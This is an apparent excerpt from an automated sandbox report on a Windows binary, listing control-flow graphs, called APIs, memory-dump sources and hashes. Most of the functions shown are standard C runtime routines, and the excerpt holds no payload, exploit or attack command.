                                                                                                                                                                                                                      control_flow_graph 653 624633-624643 654 624645-624658 call 61b8cd call 61b8e0 653->654 655 62465d-62465f 653->655 669 6249cb 654->669 656 6249b3-6249c0 call 61b8cd call 61b8e0 655->656 657 624665-62466b 655->657 674 6249c6 call 61b7e2 656->674 657->656 660 624671-62469d 657->660 660->656 663 6246a3-6246ac 660->663 666 6246c6-6246c8 663->666 667 6246ae-6246c1 call 61b8cd call 61b8e0 663->667 672 6246ce-6246d2 666->672 673 6249af-6249b1 666->673 667->674 676 6249ce-6249d1 669->676 672->673 677 6246d8-6246dc 672->677 673->676 674->669 677->667 680 6246de-6246f5 677->680 682 6246f7-6246fa 680->682 683 62473a-624740 680->683 686 624709-62470f 682->686 687 6246fc-624704 682->687 684 624742-624749 683->684 685 624711-624728 call 61b8cd call 61b8e0 call 61b7e2 683->685 690 62474b 684->690 691 62474d-62476b call 624db8 call 6213d2 * 2 684->691 718 6248e6 685->718 686->685 688 62472d-624738 686->688 692 6247ba-6247cd 687->692 694 6247b7 688->694 690->691 723 624788-6247b0 call 624bd9 691->723 724 62476d-624783 call 61b8e0 call 61b8cd 691->724 696 6247d3-6247df 692->696 697 624889-624892 call 62ab00 692->697 694->692 696->697 701 6247e5-6247e7 696->701 707 624903 697->707 708 624894-6248a6 697->708 701->697 705 6247ed-62480e 701->705 705->697 710 624810-624826 705->710 714 624907-62491d ReadFile 707->714 708->707 715 6248a8-6248b7 GetConsoleMode 708->715 710->697 712 624828-62482a 710->712 712->697 717 62482c-62484f 712->717 719 62497b-624986 GetLastError 714->719 720 62491f-624925 714->720 715->707 721 6248b9-6248bd 715->721 717->697 725 624851-624867 717->725 722 6248e9-6248f3 call 6213d2 718->722 726 624988-62499a call 61b8e0 call 61b8cd 719->726 727 62499f-6249a2 719->727 720->719 728 624927 720->728 721->714 729 6248bf-6248d7 ReadConsoleW 721->729 722->676 723->694 724->718 725->697 732 624869-62486b 725->732 726->718 738 6249a8-6249aa 727->738 739 6248df-6248e5 call 61b886 727->739 735 62492a-62493c 728->735 736 6248f8-624901 729->736 737 6248d9 GetLastError 729->737 732->697 742 62486d-624884 732->742 735->722 745 62493e-624942 735->745 736->735 737->739 738->722 739->718 742->697 749 624944-624954 call 62434d 745->749 750 62495b-624968 745->750 762 624957-624959 749->762 752 624974-624979 call 6241a5 750->752 753 62496a call 6244a4 750->753 760 62496f-624972 752->760 753->760 760->762 762->722
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 0-3907804496
                                                                                                                                                                                                                      • Opcode ID: 8e6952089c77fa8bce461f7b15e8e5c47f7c3ea1207f4dad61d90ea3f8986675
                                                                                                                                                                                                                      • Instruction ID: 3c42d906f79685b838bd102fad14c55efcdf827e820157289498a84d6716655d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e6952089c77fa8bce461f7b15e8e5c47f7c3ea1207f4dad61d90ea3f8986675
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68B1D170E04A699FDB11DF99E880BEE7BF7AF49300F144159E4119B392CB749982CFA1
                                                                                                                                                                                                                      Function 0065781C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 763 65781c-65782f 764 657835-657837 763->764 765 6578e4-6578ea 763->765 766 6578c3-6578da 764->766 767 65783d-65784c call 6573dc 764->767 768 6578ef-6578fb call 656e96 765->768 770 6578e1-6578e2 766->770 771 6578dc 766->771 775 6578b6-6578c2 767->775 776 65784e-657857 767->776 770->768 771->770 776->775 777 657859-65785b 776->777 778 6578b0 777->778 779 65785d-65785f 777->779 778->775 780 657874-65788b 779->780 781 657861-657873 779->781 782 657892-6578af call 6575c6 780->782 783 65788d 780->783 783->782
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UnDecorator::getArgumentList.LIBCMT ref: 00657841
                                                                                                                                                                                                                        • Part of subcall function 006573DC: Replicator::operator[].LIBCMT ref: 0065745F
                                                                                                                                                                                                                        • Part of subcall function 006573DC: DName::operator+=.LIBCMT ref: 00657467
                                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 0065789A
                                                                                                                                                                                                                      • DName::DName.LIBCMT ref: 006578F2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                      • String ID: (;C$4;C$8;C$D;C
                                                                                                                                                                                                                      • API String ID: 834187326-2621726175
                                                                                                                                                                                                                      • Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                                                                                                                                                                                      • Instruction ID: d6b2b5b3d6f026d62cfc1dee8d0084e09adb7c1d809fc0f7786834ef7afe1a24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55216030A05208AFDB15DF1CE4449A97BF5EF0534BF0480A9EC46CB362EB30EA46CB48
                                                                                                                                                                                                                      Function 00616AD3 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 786 616ad3-616aeb 787 616b01-616b29 MultiByteToWideChar 786->787 788 616aed-616afd call 61e3bb 786->788 790 616c8d-616c9e call 616cbd 787->790 791 616b2f-616b3b 787->791 788->787 796 616aff 788->796 794 616b41-616b46 791->794 795 616c7d 791->795 798 616b48-616b51 call 6172a0 794->798 799 616b5b 794->799 800 616c81 795->800 796->787 807 616b71-616b76 798->807 808 616b53-616b59 798->808 802 616b5c call 61d013 799->802 803 616c83-616c8b call 616aba 800->803 805 616b61-616b66 802->805 803->790 805->807 809 616b68 805->809 807->800 811 616b7c-616b8f MultiByteToWideChar 807->811 812 616b6e 808->812 809->812 811->800 813 616b95-616bae LCMapStringEx 811->813 812->807 813->800 814 616bb4-616bbc 813->814 815 616bee-616bfa 814->815 816 616bbe-616bc3 814->816 818 616bfc-616bfe 815->818 819 616c6f 815->819 816->803 817 616bc9-616bcb 816->817 817->803 820 616bd1-616be9 LCMapStringEx 817->820 821 616c00-616c09 call 6172a0 818->821 822 616c13 818->822 823 616c73-616c7b call 616aba 819->823 820->803 830 616c29-616c2e 821->830 831 616c0b-616c11 821->831 826 616c14 call 61d013 822->826 823->803 829 616c19-616c1e 826->829 829->830 832 616c20 829->832 830->823 834 616c30-616c4a LCMapStringEx 830->834 833 616c26 831->833 832->833 833->830 834->823 835 616c4c-616c53 834->835 836 616c55-616c57 835->836 837 616c59-616c5c 835->837 838 616c5f-616c6d WideCharToMultiByte 836->838 837->838 838->823
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00616B1C
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00616B48
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00616B87
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00616BA4
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00616BE3
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00616C00
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00616C42
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00616C65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                                                                                                      • Opcode ID: 2b30d59da6d13db6a0384726a40835c5c69d36b28db5adaa1f64184a16068454
                                                                                                                                                                                                                      • Instruction ID: ad49c7e18045c5510c50865211b4118c8e1a295bdd2c58de90910171fe2ee049
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b30d59da6d13db6a0384726a40835c5c69d36b28db5adaa1f64184a16068454
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59519F7690020AABDB205FA0CC45FEA7BBBEB44740F184429F914EA260DB719D919BA0
                                                                                                                                                                                                                      Function 00621C0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 839 621c0b-621c17 840 621ca9-621cac 839->840 841 621cb2 840->841 842 621c1c-621c2d 840->842 843 621cb4-621cb8 841->843 844 621c3a-621c53 LoadLibraryExW 842->844 845 621c2f-621c32 842->845 848 621c55-621c5e GetLastError 844->848 849 621cb9-621cc9 844->849 846 621cd2-621cd4 845->846 847 621c38 845->847 846->843 851 621ca6 847->851 852 621c60-621c72 call 621398 848->852 853 621c97-621ca4 848->853 849->846 850 621ccb-621ccc FreeLibrary 849->850 850->846 851->840 852->853 856 621c74-621c86 call 621398 852->856 853->851 856->853 859 621c88-621c95 LoadLibraryExW 856->859 859->849 859->853
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00621D18,?,?,00000000,00000000,?,?,00621EC6,00000021,FlsSetValue,006313A8,006313B0,00000000), ref: 00621CCC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                                                                                                      • Opcode ID: 6bcdf34ae9433e335600c944ea7c886358ce446660ff629db2e061d67ceaba13
                                                                                                                                                                                                                      • Instruction ID: b88b9d6627f822ee77d512cb34150e3b86b684a968d62e642baa2173ebd0c534
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcdf34ae9433e335600c944ea7c886358ce446660ff629db2e061d67ceaba13
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21F639B85A34ABC7219F61FC41AAA375B9B63764F140120E905AF390D675ED02CED0
                                                                                                                                                                                                                      Function 006591B5 Relevance: 10.6, APIs: 7, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 860 6591b5-6591d8 call 6564d0 call 656e96 865 65922a-65922f call 656da4 860->865 866 6591da-6591e8 860->866 873 659234-659250 call 657378 865->873 867 65921b-659228 call 657378 866->867 868 6591ea-6591ec 866->868 867->873 870 659206-659219 call 658f67 call 6570bf 868->870 871 6591ee-6591f1 868->871 870->873 871->873 874 6591f3-659205 871->874
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UnDecorator::UScore.LIBCMT ref: 006591BF
                                                                                                                                                                                                                      • DName::DName.LIBCMT ref: 006591CB
                                                                                                                                                                                                                        • Part of subcall function 00656E96: DName::doPchar.LIBCMT ref: 00656EC7
                                                                                                                                                                                                                      • UnDecorator::getScopedName.LIBCMT ref: 0065920A
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 00659214
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 00659223
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 0065922F
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 0065923C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1480779885-0
                                                                                                                                                                                                                      • Opcode ID: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
                                                                                                                                                                                                                      • Instruction ID: 6e9f6114cb46edae0a8e9d4209e5f4502741d452cb106efc68dda57a5b8eff23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311C270914248FFDB44EF68D856AED7BB1AF01306F444199E8069B2E2DB30AB49CB15
                                                                                                                                                                                                                      Function 0061512A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 882 61512a-61514c call 6171f3 call 613a1a 887 615190-615194 882->887 888 61514e-61518a call 61528d call 6152b0 call 615082 882->888 889 6151a7-6151b6 call 613a72 call 6171d0 887->889 890 615196-6151a3 887->890 888->887 890->889
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00615131
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0061513C
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006151AA
                                                                                                                                                                                                                        • Part of subcall function 0061528D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006152A5
                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00615157
                                                                                                                                                                                                                      • _Yarn.LIBCPMT ref: 0061516D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 1088826258-1810561636
                                                                                                                                                                                                                      • Opcode ID: 98100dc638dfde452b21d0e66a389e87674f8edb85030e244e577c76310f7c90
                                                                                                                                                                                                                      • Instruction ID: 9b48e874c4f5de3ad689e8bc462ebb61011eac89713c7a7425a60035c4eb6181
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98100dc638dfde452b21d0e66a389e87674f8edb85030e244e577c76310f7c90
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B101BC75A01920ABD706EF60D8469FCBBB3BFC4380B18001DE80257381CB356B82CBCA
                                                                                                                                                                                                                      Function 0061EEBE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 904 61eebe-61eefb GetModuleHandleExW 905 61eefd-61ef0f GetProcAddress 904->905 906 61ef1e-61ef22 904->906 905->906 907 61ef11-61ef1c 905->907 908 61ef24-61ef27 FreeLibrary 906->908 909 61ef2d-61ef3a 906->909 907->906 908->909
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4E0C77D7,?,?,00000000,0062D586,000000FF,?,0061EE4E,?,?,0061EE22,00000016), ref: 0061EEF3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0061EF05
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0062D586,000000FF,?,0061EE4E,?,?,0061EE22,00000016), ref: 0061EF27
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                      • String ID: #Da$CorExitProcess$mscoree.dll
                                                                                                                                                                                                                      • API String ID: 4061214504-3766507106
                                                                                                                                                                                                                      • Opcode ID: 8345c8ad46bc2883e8e31b14c8329bd4f904b8fc139a8438cf32f6c554981f1f
                                                                                                                                                                                                                      • Instruction ID: 41874c4eda192ec5d58a27fca598925acf585e7fb66f38d003e0941b305aabf7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8345c8ad46bc2883e8e31b14c8329bd4f904b8fc139a8438cf32f6c554981f1f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B901A271904A69AFDB218F50CC09FEEBBBBFB44B14F040525FC11A22D0DBB69901CA90
                                                                                                                                                                                                                      Function 0065B1E9 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                      • Instruction ID: 491d9f4737e3c99f03c3d7f04f01cf2abeec7a933b943e5e00e942ef4a2ac762
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21C376E0810B9ACF38CEB8D9999FD7BF29F04303F58516AAC01D7A4AD7309B498710
                                                                                                                                                                                                                      Function 0065B1F3 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                      • Instruction ID: 950da33cd1e57aa854e43255ec46f26f20695bc556e1f495bee88228e10b9103
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1321C376E0810B9ACF38CEB8D9999FD7BF29F04303F58516AAC01D7A4AD7309B498710
                                                                                                                                                                                                                      Function 0065B1D5 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
